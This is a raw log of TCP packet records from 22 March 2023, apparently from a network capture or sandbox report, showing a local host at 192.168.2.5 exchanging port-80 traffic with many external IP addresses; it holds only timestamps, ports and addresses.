Mar 22, 2023 05:43:35.470104933 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.470630884 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470670938 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470756054 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.470772982 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470813036 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470825911 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.470854044 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470891953 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470911980 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.470938921 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.470992088 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.471501112 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471544981 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471582890 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471621037 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471658945 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471668959 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.471695900 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.471698999 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471712112 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.471736908 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.471751928 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.471786022 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472359896 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472403049 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472441912 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472481012 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472520113 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472520113 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472520113 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472567081 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472570896 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472594023 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472610950 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.472640038 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.472660065 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.473261118 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:35.478687048 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:35.666815042 CET	80	49827	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:35.666909933 CET	49827	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:35.802059889 CET	80	49832	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:35.802154064 CET	49832	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:36.024063110 CET	49850	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:36.229263067 CET	80	49833	72.44.93.236	192.168.2.5
Mar 22, 2023 05:43:36.229413033 CET	49833	80	192.168.2.5	72.44.93.236
Mar 22, 2023 05:43:36.996639967 CET	80	49777	185.53.177.50	192.168.2.5
Mar 22, 2023 05:43:36.996822119 CET	49777	80	192.168.2.5	185.53.177.50
Mar 22, 2023 05:43:37.067727089 CET	80	49845	188.166.152.188	192.168.2.5
Mar 22, 2023 05:43:37.068103075 CET	49845	80	192.168.2.5	188.166.152.188
Mar 22, 2023 05:43:37.336730957 CET	49855	80	192.168.2.5	210.140.73.39
Mar 22, 2023 05:43:37.474071026 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:37.474219084 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:37.866739035 CET	80	49828	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:37.866897106 CET	49828	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:38.133666039 CET	49857	80	192.168.2.5	96.91.204.114
Mar 22, 2023 05:43:38.524480104 CET	49821	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:38.608102083 CET	80	49781	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:38.608227015 CET	49781	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:38.625237942 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.657075882 CET	80	49859	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.657221079 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.662286043 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.679433107 CET	80	49851	3.65.101.129	192.168.2.5
Mar 22, 2023 05:43:38.679503918 CET	49851	80	192.168.2.5	3.65.101.129
Mar 22, 2023 05:43:38.691862106 CET	80	49859	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.702964067 CET	80	49859	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.703043938 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.703326941 CET	80	49859	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.703409910 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.703485012 CET	49859	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.706168890 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.733797073 CET	80	49859	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.736840010 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.736927986 CET	80	49860	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.736928940 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:38.737014055 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:38.737014055 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.737174988 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:38.737202883 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:38.737658978 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:38.741281986 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.758291006 CET	49867	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:38.763375998 CET	80	49861	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:38.763498068 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.764852047 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.766139030 CET	49868	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:38.771684885 CET	80	49862	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:38.771733046 CET	80	49860	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.772138119 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:38.782774925 CET	80	49860	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.782860041 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.783118010 CET	80	49860	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.783180952 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.788996935 CET	80	49868	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:38.789122105 CET	49868	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:38.791846037 CET	80	49861	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:38.791908979 CET	80	49861	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:38.791984081 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.795375109 CET	49860	80	192.168.2.5	81.171.22.4
Mar 22, 2023 05:43:38.825354099 CET	80	49860	81.171.22.4	192.168.2.5
Mar 22, 2023 05:43:38.846683025 CET	80	49864	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:38.846848011 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:38.847438097 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:38.847649097 CET	49868	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:38.868985891 CET	80	49868	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:38.880950928 CET	80	49868	104.21.23.9	192.168.2.5
Mar 22, 2023 05:43:38.881062984 CET	49868	80	192.168.2.5	104.21.23.9
Mar 22, 2023 05:43:38.883085012 CET	80	49862	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:38.883214951 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:38.885323048 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.896183968 CET	80	49863	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:38.896292925 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:38.903806925 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:38.911926985 CET	80	49861	192.124.249.20	192.168.2.5
Mar 22, 2023 05:43:38.912012100 CET	49861	80	192.168.2.5	192.124.249.20
Mar 22, 2023 05:43:38.926922083 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:38.968395948 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:39.005037069 CET	80	49862	80.93.82.33	192.168.2.5
Mar 22, 2023 05:43:39.005126953 CET	49862	80	192.168.2.5	80.93.82.33
Mar 22, 2023 05:43:39.013102055 CET	80	49864	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:39.014772892 CET	80	49864	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:39.014897108 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:39.017447948 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.017611980 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.041138887 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.041259050 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.074717045 CET	49869	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.081273079 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.081449032 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.083148003 CET	49870	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:39.085347891 CET	80	49863	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.085371971 CET	80	49863	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.085470915 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.085472107 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.095761061 CET	80	49869	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.095855951 CET	49869	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.096865892 CET	49863	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.100186110 CET	49869	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.104476929 CET	80	49870	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:39.104583979 CET	49870	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:39.121589899 CET	80	49869	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.124829054 CET	80	49869	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.124927044 CET	49869	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.125392914 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:39.126178026 CET	49870	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:39.138839960 CET	80	49853	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:39.138950109 CET	49853	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:39.147434950 CET	80	49870	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:39.148128033 CET	49871	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.154648066 CET	80	49870	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:39.154747009 CET	49870	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:39.211476088 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.211714983 CET	49873	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.233525038 CET	80	49873	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.233553886 CET	80	49872	104.26.7.221	192.168.2.5
Mar 22, 2023 05:43:39.233639002 CET	49873	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.233684063 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.235304117 CET	80	49864	70.39.251.249	192.168.2.5
Mar 22, 2023 05:43:39.235402107 CET	49864	80	192.168.2.5	70.39.251.249
Mar 22, 2023 05:43:39.255764008 CET	80	49863	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.264173031 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.264422894 CET	49873	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.285409927 CET	80	49872	104.26.7.221	192.168.2.5
Mar 22, 2023 05:43:39.285440922 CET	80	49873	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.289652109 CET	80	49873	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:39.289855957 CET	49873	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:39.294796944 CET	80	49872	104.26.7.221	192.168.2.5
Mar 22, 2023 05:43:39.294909000 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.297671080 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.307060003 CET	80	49871	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.307194948 CET	49871	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.342737913 CET	49871	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.349474907 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.357943058 CET	49875	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.361942053 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.361980915 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362005949 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362030029 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362042904 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362042904 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362056017 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362072945 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362078905 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362103939 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362104893 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362128973 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362132072 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362154007 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362164021 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362179995 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.362225056 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.362246037 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.364893913 CET	49874	80	192.168.2.5	185.15.129.58
Mar 22, 2023 05:43:39.374524117 CET	80	49872	104.26.7.221	192.168.2.5
Mar 22, 2023 05:43:39.374613047 CET	49872	80	192.168.2.5	104.26.7.221
Mar 22, 2023 05:43:39.379472971 CET	80	49875	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.379578114 CET	49875	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.379916906 CET	49875	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.384700060 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.388778925 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.388849974 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.388907909 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.388922930 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.388923883 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.388951063 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.388977051 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389002085 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.389027119 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389050007 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.389076948 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389090061 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.389134884 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389137030 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.389162064 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389183044 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.389211893 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.389259100 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.402246952 CET	80	49875	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.421999931 CET	80	49875	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.422135115 CET	49875	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.482403040 CET	49876	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:39.494076967 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.501414061 CET	80	49871	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.501446009 CET	80	49871	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.501523972 CET	49871	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.503310919 CET	49871	80	192.168.2.5	3.19.116.195
Mar 22, 2023 05:43:39.534421921 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.535348892 CET	80	49877	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:39.535459995 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.555795908 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.555932045 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.558202982 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.567976952 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.569133997 CET	49879	80	192.168.2.5	104.26.14.53
Mar 22, 2023 05:43:39.569485903 CET	49880	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:39.569745064 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:39.579622030 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.590854883 CET	80	49879	104.26.14.53	192.168.2.5
Mar 22, 2023 05:43:39.591015100 CET	49879	80	192.168.2.5	104.26.14.53
Mar 22, 2023 05:43:39.591291904 CET	49879	80	192.168.2.5	104.26.14.53
Mar 22, 2023 05:43:39.592775106 CET	80	49880	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:39.592871904 CET	49880	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:39.594279051 CET	49880	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:39.608517885 CET	80	49877	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:39.609642029 CET	80	49877	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:39.609723091 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.612958908 CET	80	49879	104.26.14.53	192.168.2.5
Mar 22, 2023 05:43:39.617213964 CET	80	49880	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:39.629792929 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.643205881 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.643322945 CET	80	49866	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:39.643321037 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.643382072 CET	49866	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:39.661673069 CET	80	49871	3.19.116.195	192.168.2.5
Mar 22, 2023 05:43:39.671821117 CET	80	49877	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:39.671932936 CET	49877	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:39.686682940 CET	80	49814	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:39.686785936 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:39.693773985 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.693830967 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.693842888 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.693876982 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.693898916 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.693926096 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.693970919 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.693979025 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.693979979 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.694014072 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.694026947 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.694058895 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.694103956 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.694109917 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.694109917 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.694185972 CET	80	49865	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:39.694236994 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.694236994 CET	49865	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:39.709022045 CET	80	49881	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:39.709112883 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:39.714267015 CET	80	49880	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:39.714370012 CET	49880	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:39.752978086 CET	80	49876	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:39.755059004 CET	49876	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:39.775686979 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:39.791876078 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.791924000 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.792046070 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.792429924 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.814223051 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.835736990 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.864670038 CET	49876	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:39.866975069 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:39.915052891 CET	80	49881	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:39.941400051 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.941463947 CET	80	49878	188.114.96.3	192.168.2.5
Mar 22, 2023 05:43:39.941524982 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.941622019 CET	49878	80	192.168.2.5	188.114.96.3
Mar 22, 2023 05:43:39.956581116 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:39.981372118 CET	80	49883	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:39.981561899 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:39.990192890 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:39.991427898 CET	49884	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:39.991427898 CET	49885	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:40.012955904 CET	80	49885	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:40.013092041 CET	49885	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:40.014619112 CET	80	49884	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:40.014733076 CET	49884	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:40.014772892 CET	80	49883	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:40.014806986 CET	80	49883	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:40.014950037 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:40.015583038 CET	49885	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:40.016133070 CET	49884	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:40.016963959 CET	80	49882	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.017327070 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.033487082 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.034928083 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:40.037544966 CET	80	49885	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:40.039325953 CET	80	49884	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:40.041521072 CET	80	49884	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:40.042084932 CET	49884	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:40.043049097 CET	49886	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:40.060250044 CET	80	49883	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:40.061068058 CET	49883	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:40.080244064 CET	80	49886	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:40.080523968 CET	49886	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:40.098216057 CET	49886	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:40.102569103 CET	80	49881	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:40.102915049 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:40.128993988 CET	80	49885	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:40.129014015 CET	80	49885	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:40.129046917 CET	80	49885	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:40.129149914 CET	49885	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:40.129225016 CET	49885	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:40.135354996 CET	80	49886	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:40.135924101 CET	80	49876	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:40.136189938 CET	80	49876	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:40.136218071 CET	80	49876	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:40.136295080 CET	49876	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:40.153975964 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.158592939 CET	80	49886	89.161.163.246	192.168.2.5
